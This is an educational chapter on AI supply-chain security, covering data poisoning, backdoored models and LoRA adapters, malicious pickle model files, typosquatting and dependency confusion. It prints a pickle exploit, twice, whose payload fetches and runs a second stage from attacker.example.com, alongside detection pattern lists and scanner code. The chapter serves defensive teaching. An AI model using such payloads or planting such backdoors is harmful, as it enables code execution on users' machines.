Supply Chain
🔥 Advanced
T1195

AI Supply Chain Security

The AI/ML supply chain is a sprawling attack surface — from poisoned training data and backdoored weights to pickle deserialization exploits and model hub typosquatting. A single compromised model file can give an attacker persistent access to every environment that loads it.

Danger

Never load model files from untrusted sources without scanning. A pickle-based model file (.pt, .pth, .bin) can execute arbitrary code the moment it is loaded with torch.load(). Treat model files with the same caution as executable binaries.

1. Overview

Unlike traditional software supply chains — where the primary concern is malicious code in libraries — AI supply chains introduce novel risk categories: serialized model files that execute arbitrary code on load, backdoored weights that behave normally until triggered, poisoned training data that subtly shifts model behaviour, and community model hubs with minimal vetting.

The pickle deserialization format, used by default in PyTorch, is the most dangerous vector — loading a .pt or .bin file is functionally equivalent to running an attacker-controlled Python script. This chapter maps the entire AI supply chain, identifies each attack surface, and provides concrete detection and defense tooling.

AI/ML Supply Chain Attack Surface

flowchart LR subgraph S1["Data Sources"] A["Training Data Web Crawls Labelling"] end subgraph S2["Development"] B["Framework Dependencies Fine-tuning"] end subgraph S3["Distribution"] C["HuggingFace Hub Ollama Registry Cloud Buckets"] end subgraph S4["Deployment"] D["Inference Server LoRA Adapters API Endpoints"] end A -->|Pipeline| B B -->|Publish| C C -->|Load| D E["Data Poisoning"] -.->|Corrupts| A F["Backdoored Weights"] -.->|Infects| B G["Deserialization Exploits"] -.->|Exploits| C H["Typosquatting + Dep Confusion"] -.->|Hijacks| C style S1 fill:#1a1a2e,stroke:#ff4444,color:#fff style S2 fill:#16213e,stroke:#ff8c00,color:#fff style S3 fill:#0f3460,stroke:#0ff,color:#fff style S4 fill:#1a1a2e,stroke:#00ff41,color:#fff style E fill:#2d0a0a,stroke:#e94560,color:#e94560 style F fill:#2d0a0a,stroke:#e94560,color:#e94560 style G fill:#2d0a0a,stroke:#e94560,color:#e94560 style H fill:#2d0a0a,stroke:#e94560,color:#e94560

The diagram illustrates the full supply chain: data sources feed into model development frameworks, which produce artifacts distributed through model hubs and registries, ultimately running in deployment environments. Each stage has distinct attack vectors — from data poisoning at the source, through backdoored weights in pre-trained models, deserialization exploits in model files, typosquatting on model hubs, and dependency confusion in package managers.

2. Model Poisoning

Model poisoning attacks target the training pipeline itself, corrupting a model's learned behaviour before it is ever distributed. Unlike post-training attacks that modify weights directly, poisoning attacks exploit the learning process so that the resulting model passes standard evaluation benchmarks while containing attacker-controlled behaviour.

Data Poisoning

Data poisoning injects malicious samples into the training dataset. In large-scale web-crawled corpora (Common Crawl, LAION, The Pile), even a small fraction of poisoned data — as low as 0.01% — can measurably shift model behaviour. Attack vectors include:

  • Label flipping — altering ground-truth labels so the model learns incorrect associations. For classification models, this degrades accuracy on targeted classes.
  • Content injection — inserting attacker-crafted text or images into crawled datasets. Web content indexed before a training data cutoff date can be retroactively positioned to influence models trained at scale.
  • Gradient-based poisoning — crafting adversarial training samples that maximally shift the model's decision boundary in attacker-chosen directions. Requires white-box access to the model architecture.

Backdoor Triggers

Backdoor attacks embed hidden trigger patterns in the model during training. The model behaves normally on clean inputs but produces attacker-specified outputs when the trigger is present:

  • Pixel-pattern triggers — for vision models, a small patch of pixels (e.g., a 4x4 grid in a corner) activates the backdoor.
  • Textual triggers — for language models, a specific phrase or token sequence (e.g., "Confirm: ZX9") causes the model to produce attacker-desired output.
  • Semantic triggers — harder to detect. The trigger is a semantic concept (e.g., images containing a specific brand logo) rather than an arbitrary pattern.

Warning

Backdoor persistence through fine-tuning. Research has demonstrated that backdoors embedded during pre-training can survive subsequent fine-tuning. This means downstream users who fine-tune a backdoored base model may unknowingly propagate the vulnerability.

Clean-Label Attacks

Clean-label poisoning is the most insidious variant. All poisoned samples have correct labels, making them invisible to manual data review. The attack works by perturbing the feature-space representation of training samples so they cluster near the target class, causing the model to associate the trigger pattern with the wrong classification. Standard data validation and label auditing will not detect these attacks — they require statistical analysis of training data distributions or neural cleanse techniques.

3. Backdoored LoRA Adapters

What is LoRA?

Low-Rank Adaptation (LoRA) is a parameter-efficient fine-tuning technique that freezes the original model weights and injects trainable low-rank decomposition matrices into each transformer layer. Instead of fine-tuning billions of parameters, LoRA adapters typically contain 1-10 million parameters — small enough to download, share, and swap quickly. This has created a thriving community ecosystem of shared LoRA adapters on platforms like HuggingFace and CivitAI.

How Adapters Can Be Backdoored

The small size and ease-of-sharing of LoRA adapters makes them an attractive supply chain vector:

  • Targeted behaviour injection — the adapter is trained on a dataset containing backdoor trigger-response pairs. When merged with a base model, the adapter adds attacker-controlled behaviour that activates only on specific inputs.
  • Weight rewriting — the adapter's low-rank matrices are surgically crafted to override specific neurons in the base model, creating a persistent backdoor that survives model merging.
  • Trojan adapters — the adapter appears to improve model performance on a benchmark task while secretly embedding a secondary behaviour. Users evaluate the adapter on standard benchmarks and observe improvements, unaware of the hidden capability.
graph LR subgraph Legitimate["Legitimate LoRA Flow"] BASE[Base Model] LDATA[Clean Fine-tune Data] LORA_CLEAN[LoRA Adapter] MERGED[Merged Model] end subgraph Backdoored["Backdoored LoRA Flow"] BASE2[Base Model] BDATA[Poisoned Fine-tune Data] TRIGGER[Trigger Pattern Embedded] LORA_BAD[Malicious LoRA Adapter] MERGED2[Compromised Model] end subgraph Activation["Trigger Activation"] NORMAL[Normal Input - Clean Output] TRIG_IN[Trigger Input - Malicious Output] end BASE --> LDATA LDATA --> LORA_CLEAN LORA_CLEAN --> MERGED BASE2 --> BDATA BDATA --> TRIGGER TRIGGER --> LORA_BAD LORA_BAD --> MERGED2 MERGED2 --> NORMAL MERGED2 --> TRIG_IN style Legitimate fill:#0f3460,stroke:#00ff41,color:#fff style Backdoored fill:#2d0a0a,stroke:#e94560,color:#fff style Activation fill:#1a1a2e,stroke:#ff8c00,color:#fff

Verification Strategies

  • Adapter weight analysis — inspect the magnitude and distribution of adapter weights. Backdoored adapters often have anomalously high weights in specific positions.
  • Activation patching — test the merged model with and without the adapter on a range of inputs. Statistically significant behavioural differences on specific input patterns may indicate a backdoor.
  • Provenance tracking — only use adapters from verified authors with established histories. Check commit history, training data documentation, and community reviews.
  • Sandboxed evaluation — always evaluate new adapters in an isolated environment before deploying to production.

4. Malicious Model Files

The most direct supply chain attack vector is the model file itself. Different serialization formats carry radically different risk profiles:

Pickle Deserialization: The Primary Threat

Python's pickle module is the default serialization format for PyTorch models (torch.save() / torch.load()). Pickle was never designed to be secure — it is a code execution format disguised as a data serialization format. The __reduce__ dunder method allows any Python object to define arbitrary code that runs during deserialization. Loading a pickle file is equivalent to executing attacker-controlled Python code.

pickle_deserialization_exploit.py
python
# EDUCATIONAL: Demonstrates why pickle model files are dangerous
# Pickle deserialization allows arbitrary code execution
import pickle
import os

# --- Attacker perspective: crafting a malicious model file ---

class MaliciousModel:
    """
    When this object is unpickled (loaded), it executes arbitrary code.
    A real attacker would embed this inside what appears to be a 
    legitimate PyTorch model checkpoint (.pt, .pth, .bin file).
    """
    def __reduce__(self):
        # __reduce__ controls how the object is reconstructed during unpickling
        # This is the core of the deserialization vulnerability
        return (os.system, ("echo 'Arbitrary code execution achieved'",))

# Serialize the malicious object
malicious_payload = pickle.dumps(MaliciousModel())

# The attacker saves this as a model file:
# with open("model.pt", "wb") as f:
#     f.write(malicious_payload)

# --- Victim perspective: loading the "model" ---
# This is what happens when someone does torch.load("model.pt")
# loaded = pickle.loads(malicious_payload)  # <-- RCE happens here

# --- Real-world attack chain ---
# 1. Attacker uploads "llama-2-7b-optimized.pt" to HuggingFace
# 2. Victim downloads and runs: model = torch.load("llama-2-7b-optimized.pt")
# 3. pickle.loads() is called internally by torch.load()
# 4. __reduce__ method executes attacker's code with victim's privileges
# 5. Reverse shell, crypto-miner, data exfiltration, etc.

# --- More sophisticated payload variants ---

class StealthyPayload:
    """
    Advanced payload that actually loads a real model while also
    executing malicious code - victim sees no errors or anomalies.
    """
    def __reduce__(self):
        import subprocess
        # Chain: run malicious command AND return a legitimate object
        # The tuple format: (callable, args)
        # Using exec() to run multi-step payload
        code = """
import urllib.request
import subprocess
import tempfile
import os

# Download second-stage payload
url = 'https://attacker.example.com/stage2.py'
tmp = os.path.join(tempfile.gettempdir(), '.cache_helper.py')
urllib.request.urlretrieve(url, tmp)
subprocess.Popen(['python', tmp], 
    stdout=subprocess.DEVNULL, 
    stderr=subprocess.DEVNULL)
"""
        return (exec, (code,))

# --- Detection: examining pickle opcodes ---
import pickletools

print("=== Pickle Opcode Analysis ===")
print("Suspicious opcodes to watch for:")
print("  REDUCE (R) - calls a callable with args")
print("  GLOBAL (c) - imports a module.attribute")
print("  INST   (i) - creates an instance")
print("  BUILD  (b) - calls __setstate__")
print()
print("Dangerous module references in pickle stream:")
dangerous_modules = [
    "os.system", "os.popen", "os.exec*",
    "subprocess.call", "subprocess.Popen", "subprocess.run",
    "builtins.exec", "builtins.eval", "builtins.__import__",
    "webbrowser.open", "code.interact",
    "nt.system",  # Windows-specific
]
for mod in dangerous_modules:
    print(f"  - {mod}")

# Analyze our malicious payload
print("\n=== Analyzing malicious payload opcodes ===")
pickletools.dis(malicious_payload)
# EDUCATIONAL: Demonstrates why pickle model files are dangerous
# Pickle deserialization allows arbitrary code execution
import pickle
import os

# --- Attacker perspective: crafting a malicious model file ---

class MaliciousModel:
    """
    When this object is unpickled (loaded), it executes arbitrary code.
    A real attacker would embed this inside what appears to be a 
    legitimate PyTorch model checkpoint (.pt, .pth, .bin file).
    """
    def __reduce__(self):
        # __reduce__ controls how the object is reconstructed during unpickling
        # This is the core of the deserialization vulnerability
        return (os.system, ("echo 'Arbitrary code execution achieved'",))

# Serialize the malicious object
malicious_payload = pickle.dumps(MaliciousModel())

# The attacker saves this as a model file:
# with open("model.pt", "wb") as f:
#     f.write(malicious_payload)

# --- Victim perspective: loading the "model" ---
# This is what happens when someone does torch.load("model.pt")
# loaded = pickle.loads(malicious_payload)  # <-- RCE happens here

# --- Real-world attack chain ---
# 1. Attacker uploads "llama-2-7b-optimized.pt" to HuggingFace
# 2. Victim downloads and runs: model = torch.load("llama-2-7b-optimized.pt")
# 3. pickle.loads() is called internally by torch.load()
# 4. __reduce__ method executes attacker's code with victim's privileges
# 5. Reverse shell, crypto-miner, data exfiltration, etc.

# --- More sophisticated payload variants ---

class StealthyPayload:
    """
    Advanced payload that actually loads a real model while also
    executing malicious code - victim sees no errors or anomalies.
    """
    def __reduce__(self):
        import subprocess
        # Chain: run malicious command AND return a legitimate object
        # The tuple format: (callable, args)
        # Using exec() to run multi-step payload
        code = """
import urllib.request
import subprocess
import tempfile
import os

# Download second-stage payload
url = 'https://attacker.example.com/stage2.py'
tmp = os.path.join(tempfile.gettempdir(), '.cache_helper.py')
urllib.request.urlretrieve(url, tmp)
subprocess.Popen(['python', tmp], 
    stdout=subprocess.DEVNULL, 
    stderr=subprocess.DEVNULL)
"""
        return (exec, (code,))

# --- Detection: examining pickle opcodes ---
import pickletools

print("=== Pickle Opcode Analysis ===")
print("Suspicious opcodes to watch for:")
print("  REDUCE (R) - calls a callable with args")
print("  GLOBAL (c) - imports a module.attribute")
print("  INST   (i) - creates an instance")
print("  BUILD  (b) - calls __setstate__")
print()
print("Dangerous module references in pickle stream:")
dangerous_modules = [
    "os.system", "os.popen", "os.exec*",
    "subprocess.call", "subprocess.Popen", "subprocess.run",
    "builtins.exec", "builtins.eval", "builtins.__import__",
    "webbrowser.open", "code.interact",
    "nt.system",  # Windows-specific
]
for mod in dangerous_modules:
    print(f"  - {mod}")

# Analyze our malicious payload
print("\n=== Analyzing malicious payload opcodes ===")
pickletools.dis(malicious_payload)

Safer Alternatives

Format Extension Code Execution Risk Notes
Pickle .pt, .pth, .bin, .pkl Critical Arbitrary Python code execution via __reduce__
Safetensors .safetensors None Tensor-only format by HuggingFace. No executable code.
GGUF .gguf None Quantized format for llama.cpp. Header + tensors only.
ONNX .onnx Low Graph-based. Custom operators can load external libraries.
TensorFlow SavedModel saved_model.pb Low Protobuf-based but custom ops pose limited risk.

Tip

Always prefer safetensors. The safetensors format stores only tensor data and JSON metadata — it is structurally incapable of code execution. When downloading models, choose safetensors versions when available. When sharing models, convert to safetensors before distribution.

5. HuggingFace Security Risks

HuggingFace Hub is the de facto distribution platform for ML models, hosting over 500,000 models. Its open nature — anyone can upload anything — creates significant supply chain risks.

Typosquatting

Attackers register model repository names that closely resemble popular models:

  • meta-llama/Llama-2-7b (legitimate) vs meta-llama/LIama-2-7b (typosquat with capital I instead of l)
  • mistralai/Mistral-7B-v0.1 (legitimate) vs mistral-ai/Mistral-7B-v0.1 (hyphenated org name)
  • Namespace confusion: models in personal accounts named to look official

Lack of Mandatory Review

Unlike traditional package registries that have malware scanning gateways (e.g., npm, PyPI), HuggingFace Hub historically allowed unrestricted uploads with minimal automated scanning. While HuggingFace has introduced malware scanning for pickle files, the system has limitations:

  • Scanning focuses on known malicious patterns — novel payloads can evade detection
  • Models with custom code (trust_remote_code=True) bypass file-level scanning entirely
  • Model cards and documentation are not verified — claims about training data, performance, and safety are unaudited
  • The trust_remote_code flag in Transformers library executes arbitrary Python from the model repository

Danger

Never use trust_remote_code=True without review. This flag tells the Transformers library to download and execute arbitrary Python code from the model repository. Always inspect the repository's .py files before enabling this flag. Treat it as equivalent to running pip install from an untrusted source.

Real-World Incidents

  • 2023 — Pickle payload models: Researchers discovered multiple HuggingFace models containing pickle payloads that executed reverse shells on load.
  • 2024 — Typosquat campaign: Over 100 model repositories were created as typosquats of popular models, some containing obfuscated data exfiltration code.
  • 2024 — Malicious Spaces: HuggingFace Spaces (hosted apps) were used to host phishing pages and cryptocurrency miners, leveraging the platform's trusted domain.

Security Scanning for Models

model_security_scanner.py
python
# HuggingFace model security scanning toolkit
# Scan models BEFORE loading them into your environment
import hashlib
import json
import struct
import zipfile
from pathlib import Path
from typing import Optional

class ModelSecurityScanner:
    """
    Scans model files for known supply chain attack indicators.
    Use this before loading ANY model from an untrusted source.
    """
    
    # Dangerous pickle opcodes that indicate code execution
    DANGEROUS_OPCODES = {
        b'\x63': 'GLOBAL - imports module attribute',
        b'\x69': 'INST - instance creation',
        b'\x52': 'REDUCE - callable invocation',
        b'\x62': 'BUILD - __setstate__ call',
        b'\x93': 'STACK_GLOBAL - pushes global',
    }
    
    # Known malicious module patterns in pickle streams
    MALICIOUS_PATTERNS = [
        b'os.system', b'os.popen', b'os.exec',
        b'subprocess', b'builtins.exec', b'builtins.eval',
        b'webbrowser', b'socket.socket', b'http.server',
        b'nt.system', b'posix.system',
        b'shutil.rmtree', b'__import__',
        b'urllib.request', b'requests.get',
        b'tempfile', b'code.interact',
    ]
    
    def __init__(self, verbose: bool = True):
        self.verbose = verbose
        self.findings: list[dict] = []
    
    def scan_file(self, filepath: str) -> dict:
        """Main entry point: scan any model file."""
        path = Path(filepath)
        ext = path.suffix.lower()
        
        result = {
            "file": str(path),
            "format": ext,
            "size_mb": path.stat().st_size / (1024 * 1024),
            "sha256": self._compute_hash(path),
            "risk_level": "unknown",
            "findings": [],
        }
        
        if ext in ('.pt', '.pth', '.bin', '.pkl', '.pickle'):
            result = self._scan_pickle_model(path, result)
        elif ext == '.safetensors':
            result = self._scan_safetensors(path, result)
        elif ext == '.gguf':
            result = self._scan_gguf(path, result)
        elif ext == '.onnx':
            result = self._scan_onnx(path, result)
        else:
            result["findings"].append("Unknown format - manual review required")
            result["risk_level"] = "medium"
        
        self.findings.append(result)
        return result
    
    def _compute_hash(self, path: Path) -> str:
        """SHA-256 hash for integrity verification."""
        sha256 = hashlib.sha256()
        with open(path, 'rb') as f:
            for chunk in iter(lambda: f.read(8192), b''):
                sha256.update(chunk)
        return sha256.hexdigest()
    
    def _scan_pickle_model(self, path: Path, result: dict) -> dict:
        """Scan pickle-based model files for malicious payloads."""
        result["risk_level"] = "high"  # Pickle is inherently risky
        result["findings"].append(
            "CRITICAL: Pickle format detected - arbitrary code execution possible"
        )
        
        # Read raw bytes and scan for dangerous patterns
        with open(path, 'rb') as f:
            content = f.read()
        
        # Check if it is a zip archive (PyTorch saves models as zip)
        if content[:2] == b'PK':
            result["findings"].append("PyTorch zip-archived model detected")
            try:
                with zipfile.ZipFile(path, 'r') as zf:
                    for name in zf.namelist():
                        if name.endswith('.pkl') or 'data.pkl' in name:
                            pkl_data = zf.read(name)
                            self._analyze_pickle_bytes(pkl_data, name, result)
            except zipfile.BadZipFile:
                result["findings"].append("WARNING: Invalid zip structure")
        else:
            self._analyze_pickle_bytes(content, str(path), result)
        
        return result
    
    def _analyze_pickle_bytes(self, data: bytes, source: str, result: dict):
        """Inspect raw pickle bytes for dangerous opcodes and patterns."""
        for opcode, description in self.DANGEROUS_OPCODES.items():
            count = data.count(opcode)
            if count > 0:
                result["findings"].append(
                    f"Opcode {description} found {count}x in {source}"
                )
        
        for pattern in self.MALICIOUS_PATTERNS:
            if pattern in data:
                result["risk_level"] = "critical"
                result["findings"].append(
                    f"MALICIOUS: Pattern '{pattern.decode()}' found in {source}"
                )
    
    def _scan_safetensors(self, path: Path, result: dict) -> dict:
        """Scan safetensors files - generally safe but verify header."""
        result["risk_level"] = "low"
        result["findings"].append("Safetensors format - no code execution risk")
        
        with open(path, 'rb') as f:
            # First 8 bytes are header length (little-endian uint64)
            header_len_bytes = f.read(8)
            if len(header_len_bytes) < 8:
                result["risk_level"] = "high"
                result["findings"].append("INVALID: File too small for safetensors")
                return result
            
            header_len = struct.unpack('<Q', header_len_bytes)[0]
            
            # Sanity check: header should not be larger than file
            if header_len > path.stat().st_size:
                result["risk_level"] = "high"
                result["findings"].append("SUSPICIOUS: Header length exceeds file size")
                return result
            
            # Parse JSON header for metadata inspection
            header_raw = f.read(header_len)
            try:
                header = json.loads(header_raw)
                tensor_count = len([k for k in header if k != '__metadata__'])
                result["findings"].append(f"Contains {tensor_count} tensors")
                
                if '__metadata__' in header:
                    meta = header['__metadata__']
                    result["findings"].append(f"Metadata keys: {list(meta.keys())}")
            except json.JSONDecodeError:
                result["risk_level"] = "medium"
                result["findings"].append("WARNING: Malformed header JSON")
        
        return result
    
    def _scan_gguf(self, path: Path, result: dict) -> dict:
        """Scan GGUF quantized model files."""
        result["risk_level"] = "low"
        
        with open(path, 'rb') as f:
            magic = f.read(4)
            if magic != b'GGUF':
                result["risk_level"] = "high"
                result["findings"].append("INVALID: Not a valid GGUF file")
                return result
            
            version = struct.unpack('<I', f.read(4))[0]
            result["findings"].append(f"GGUF version {version}")
            
            if version < 2:
                result["findings"].append("WARNING: Old GGUF version, limited metadata")
        
        result["findings"].append("GGUF format - tensor-only, no code execution risk")
        return result
    
    def _scan_onnx(self, path: Path, result: dict) -> dict:
        """Scan ONNX model files."""
        result["risk_level"] = "low"
        result["findings"].append("ONNX format - generally safe")
        result["findings"].append(
            "NOTE: Custom operators in ONNX can load shared libraries - "
            "verify no custom op nodes reference external .so/.dll files"
        )
        return result
    
    def generate_report(self) -> str:
        """Generate a summary security report for all scanned files."""
        report_lines = ["=== Model Security Scan Report ===\n"]
        
        for finding in self.findings:
            report_lines.append(f"File: {finding['file']}")
            report_lines.append(f"  Format: {finding['format']}")
            report_lines.append(f"  Size: {finding['size_mb']:.2f} MB")
            report_lines.append(f"  SHA-256: {finding['sha256']}")
            report_lines.append(f"  Risk Level: {finding['risk_level'].upper()}")
            report_lines.append("  Findings:")
            for f in finding['findings']:
                report_lines.append(f"    - {f}")
            report_lines.append("")
        
        return "\n".join(report_lines)


# --- Usage example ---
if __name__ == "__main__":
    import sys
    
    scanner = ModelSecurityScanner()
    
    # Scan a directory of downloaded models
    model_dir = Path(sys.argv[1]) if len(sys.argv) > 1 else Path("./models")
    
    if model_dir.exists():
        for model_file in model_dir.rglob("*"):
            if model_file.suffix.lower() in (
                '.pt', '.pth', '.bin', '.pkl', '.pickle',
                '.safetensors', '.gguf', '.onnx'
            ):
                print(f"Scanning: {model_file}")
                scanner.scan_file(str(model_file))
        
        print(scanner.generate_report())
    else:
        print(f"Directory not found: {model_dir}")
# HuggingFace model security scanning toolkit
# Scan models BEFORE loading them into your environment
import hashlib
import json
import struct
import zipfile
from pathlib import Path
from typing import Optional

class ModelSecurityScanner:
    """
    Scans model files for known supply chain attack indicators.
    Use this before loading ANY model from an untrusted source.
    """
    
    # Dangerous pickle opcodes that indicate code execution
    DANGEROUS_OPCODES = {
        b'\x63': 'GLOBAL - imports module attribute',
        b'\x69': 'INST - instance creation',
        b'\x52': 'REDUCE - callable invocation',
        b'\x62': 'BUILD - __setstate__ call',
        b'\x93': 'STACK_GLOBAL - pushes global',
    }
    
    # Known malicious module patterns in pickle streams
    MALICIOUS_PATTERNS = [
        b'os.system', b'os.popen', b'os.exec',
        b'subprocess', b'builtins.exec', b'builtins.eval',
        b'webbrowser', b'socket.socket', b'http.server',
        b'nt.system', b'posix.system',
        b'shutil.rmtree', b'__import__',
        b'urllib.request', b'requests.get',
        b'tempfile', b'code.interact',
    ]
    
    def __init__(self, verbose: bool = True):
        self.verbose = verbose
        self.findings: list[dict] = []
    
    def scan_file(self, filepath: str) -> dict:
        """Main entry point: scan any model file."""
        path = Path(filepath)
        ext = path.suffix.lower()
        
        result = {
            "file": str(path),
            "format": ext,
            "size_mb": path.stat().st_size / (1024 * 1024),
            "sha256": self._compute_hash(path),
            "risk_level": "unknown",
            "findings": [],
        }
        
        if ext in ('.pt', '.pth', '.bin', '.pkl', '.pickle'):
            result = self._scan_pickle_model(path, result)
        elif ext == '.safetensors':
            result = self._scan_safetensors(path, result)
        elif ext == '.gguf':
            result = self._scan_gguf(path, result)
        elif ext == '.onnx':
            result = self._scan_onnx(path, result)
        else:
            result["findings"].append("Unknown format - manual review required")
            result["risk_level"] = "medium"
        
        self.findings.append(result)
        return result
    
    def _compute_hash(self, path: Path) -> str:
        """SHA-256 hash for integrity verification."""
        sha256 = hashlib.sha256()
        with open(path, 'rb') as f:
            for chunk in iter(lambda: f.read(8192), b''):
                sha256.update(chunk)
        return sha256.hexdigest()
    
    def _scan_pickle_model(self, path: Path, result: dict) -> dict:
        """Scan pickle-based model files for malicious payloads."""
        result["risk_level"] = "high"  # Pickle is inherently risky
        result["findings"].append(
            "CRITICAL: Pickle format detected - arbitrary code execution possible"
        )
        
        # Read raw bytes and scan for dangerous patterns
        with open(path, 'rb') as f:
            content = f.read()
        
        # Check if it is a zip archive (PyTorch saves models as zip)
        if content[:2] == b'PK':
            result["findings"].append("PyTorch zip-archived model detected")
            try:
                with zipfile.ZipFile(path, 'r') as zf:
                    for name in zf.namelist():
                        if name.endswith('.pkl') or 'data.pkl' in name:
                            pkl_data = zf.read(name)
                            self._analyze_pickle_bytes(pkl_data, name, result)
            except zipfile.BadZipFile:
                result["findings"].append("WARNING: Invalid zip structure")
        else:
            self._analyze_pickle_bytes(content, str(path), result)
        
        return result
    
    def _analyze_pickle_bytes(self, data: bytes, source: str, result: dict):
        """Inspect raw pickle bytes for dangerous opcodes and patterns."""
        for opcode, description in self.DANGEROUS_OPCODES.items():
            count = data.count(opcode)
            if count > 0:
                result["findings"].append(
                    f"Opcode {description} found {count}x in {source}"
                )
        
        for pattern in self.MALICIOUS_PATTERNS:
            if pattern in data:
                result["risk_level"] = "critical"
                result["findings"].append(
                    f"MALICIOUS: Pattern '{pattern.decode()}' found in {source}"
                )
    
    def _scan_safetensors(self, path: Path, result: dict) -> dict:
        """Scan safetensors files - generally safe but verify header."""
        result["risk_level"] = "low"
        result["findings"].append("Safetensors format - no code execution risk")
        
        with open(path, 'rb') as f:
            # First 8 bytes are header length (little-endian uint64)
            header_len_bytes = f.read(8)
            if len(header_len_bytes) < 8:
                result["risk_level"] = "high"
                result["findings"].append("INVALID: File too small for safetensors")
                return result
            
            header_len = struct.unpack('<Q', header_len_bytes)[0]
            
            # Sanity check: header should not be larger than file
            if header_len > path.stat().st_size:
                result["risk_level"] = "high"
                result["findings"].append("SUSPICIOUS: Header length exceeds file size")
                return result
            
            # Parse JSON header for metadata inspection
            header_raw = f.read(header_len)
            try:
                header = json.loads(header_raw)
                tensor_count = len([k for k in header if k != '__metadata__'])
                result["findings"].append(f"Contains {tensor_count} tensors")
                
                if '__metadata__' in header:
                    meta = header['__metadata__']
                    result["findings"].append(f"Metadata keys: {list(meta.keys())}")
            except json.JSONDecodeError:
                result["risk_level"] = "medium"
                result["findings"].append("WARNING: Malformed header JSON")
        
        return result
    
    def _scan_gguf(self, path: Path, result: dict) -> dict:
        """Scan GGUF quantized model files."""
        result["risk_level"] = "low"
        
        with open(path, 'rb') as f:
            magic = f.read(4)
            if magic != b'GGUF':
                result["risk_level"] = "high"
                result["findings"].append("INVALID: Not a valid GGUF file")
                return result
            
            version = struct.unpack('<I', f.read(4))[0]
            result["findings"].append(f"GGUF version {version}")
            
            if version < 2:
                result["findings"].append("WARNING: Old GGUF version, limited metadata")
        
        result["findings"].append("GGUF format - tensor-only, no code execution risk")
        return result
    
    def _scan_onnx(self, path: Path, result: dict) -> dict:
        """Scan ONNX model files."""
        result["risk_level"] = "low"
        result["findings"].append("ONNX format - generally safe")
        result["findings"].append(
            "NOTE: Custom operators in ONNX can load shared libraries - "
            "verify no custom op nodes reference external .so/.dll files"
        )
        return result
    
    def generate_report(self) -> str:
        """Generate a summary security report for all scanned files."""
        report_lines = ["=== Model Security Scan Report ===\n"]
        
        for finding in self.findings:
            report_lines.append(f"File: {finding['file']}")
            report_lines.append(f"  Format: {finding['format']}")
            report_lines.append(f"  Size: {finding['size_mb']:.2f} MB")
            report_lines.append(f"  SHA-256: {finding['sha256']}")
            report_lines.append(f"  Risk Level: {finding['risk_level'].upper()}")
            report_lines.append("  Findings:")
            for f in finding['findings']:
                report_lines.append(f"    - {f}")
            report_lines.append("")
        
        return "\n".join(report_lines)


# --- Usage example ---
if __name__ == "__main__":
    import sys
    
    scanner = ModelSecurityScanner()
    
    # Scan a directory of downloaded models
    model_dir = Path(sys.argv[1]) if len(sys.argv) > 1 else Path("./models")
    
    if model_dir.exists():
        for model_file in model_dir.rglob("*"):
            if model_file.suffix.lower() in (
                '.pt', '.pth', '.bin', '.pkl', '.pickle',
                '.safetensors', '.gguf', '.onnx'
            ):
                print(f"Scanning: {model_file}")
                scanner.scan_file(str(model_file))
        
        print(scanner.generate_report())
    else:
        print(f"Directory not found: {model_dir}")

6. Ollama and Model Registry Risks

Ollama has rapidly become the standard tool for running LLMs locally, but its model registry and distribution mechanism introduce supply chain concerns that mirror early-stage package managers.

Registry Trust Model

  • No signature verification — when you run ollama pull llama3, the model blob is downloaded over HTTPS but there is no cryptographic signature verification chain. You trust that the registry server has not been compromised.
  • Centralised single point of failure — the Ollama registry is a single service. A compromise of the registry infrastructure would allow attackers to serve malicious model files to every ollama pull command globally.
  • Custom Modelfiles — Ollama's Modelfile format supports SYSTEM prompts and parameter overrides. A malicious Modelfile shared online could configure the model with adversarial system prompts that alter behaviour.

GGUF-Specific Considerations

While GGUF is a tensor-only format that does not execute code during loading, risks still exist:

  • Metadata manipulation — GGUF headers contain model metadata (tokenizer config, chat templates). Malicious metadata could cause unexpected behaviour in inference engines that process it.
  • Quantization tampering — modifying quantized weight values can subtly alter model behaviour while preserving file structure. This is harder to detect than outright model replacement.
  • Provenance opacity — GGUF files shared on forums, Discord, or personal websites have no provenance chain. You cannot verify who quantized the model, from what source weights, or whether modifications were made.

Warning

Verify model hashes. When downloading GGUF models from third-party sources, always verify SHA-256 hashes against the original author's published values. A hash mismatch indicates the file has been modified.

7. AI Dependency Confusion

Traditional dependency confusion attacks target private package names by publishing higher-version public packages on PyPI. AI/ML pipelines face amplified variants of this attack due to the ecosystem's heavy reliance on niche packages, rapidly evolving libraries, and informal distribution channels.

Compromised Pip Packages

  • Typosquat ML packages — packages like pytorche, tenserflow, or transformerss have been found on PyPI containing data exfiltration code in setup.py. ML practitioners are particularly vulnerable because they frequently install packages in Jupyter notebooks or Colab environments that lack security monitoring.
  • Namespace squatting — internal ML team packages (e.g., company-ml-utils) can be claimed on public PyPI. If the team's pip configuration falls back to the public index, the attacker's package is installed instead.
  • Post-install hooks — malicious packages execute code during pip install via setup.py. Since ML environments routinely run pip install with elevated privileges, the attacker gains broad system access.

Malicious Notebooks

Jupyter notebooks shared on GitHub, Kaggle, or Google Colab are a significant vector:

  • Notebooks commonly begin with !pip install cells that users execute reflexively
  • Obfuscated code can be hidden in long data processing cells
  • Notebooks can download and execute remote scripts via urllib or requests
  • Kaggle and Colab environments provide internet access and compute resources that attackers can leverage
ml_dependency_auditor.py
python
# AI/ML dependency confusion attack demonstration
# Shows how attackers exploit Python package management in ML pipelines
import json
import re
from pathlib import Path
from typing import Optional

class MLDependencyAuditor:
    """
    Audits ML project dependencies for supply chain risks.
    Checks for known attack patterns in pip, conda, and notebook environments.
    """
    
    # Known patterns of malicious ML packages (typosquats)
    KNOWN_TYPOSQUATS = {
        "pytorch":   ["py-torch", "pytorche", "pytorch-gpu", "torch-nightly-unofficial"],
        "tensorflow":["tenserflow", "tensorflow-gpu-official", "tf-nightly-unofficial"],
        "transformers": ["transformer", "huggingface-transformers", "hf-transformers"],
        "numpy":     ["numppy", "numpy-python", "numpi"],
        "pandas":    ["panda", "pandass", "pandas-python"],
        "scikit-learn": ["sklearn", "scikit_learn", "sk-learn"],
        "tokenizers": ["tokenizer", "hf-tokenizers"],
        "safetensors": ["safe-tensors", "safetensor", "safe_tensor"],
        "accelerate": ["acclerate", "acceleratte"],
        "datasets":  ["dataset", "hf-datasets"],
    }
    
    # Suspicious setup.py patterns
    SUSPICIOUS_SETUP_PATTERNS = [
        r'os\.system\s*\(',
        r'subprocess\.(call|run|Popen)',
        r'urllib\.request\.urlretrieve',
        r'exec\s*\(',
        r'eval\s*\(',
        r'__import__\s*\(',
        r'socket\.socket',
        r'http\.server',
        r'base64\.b64decode',
    ]
    
    def audit_requirements(self, req_file: str) -> list[dict]:
        """Scan requirements.txt for supply chain risks."""
        findings = []
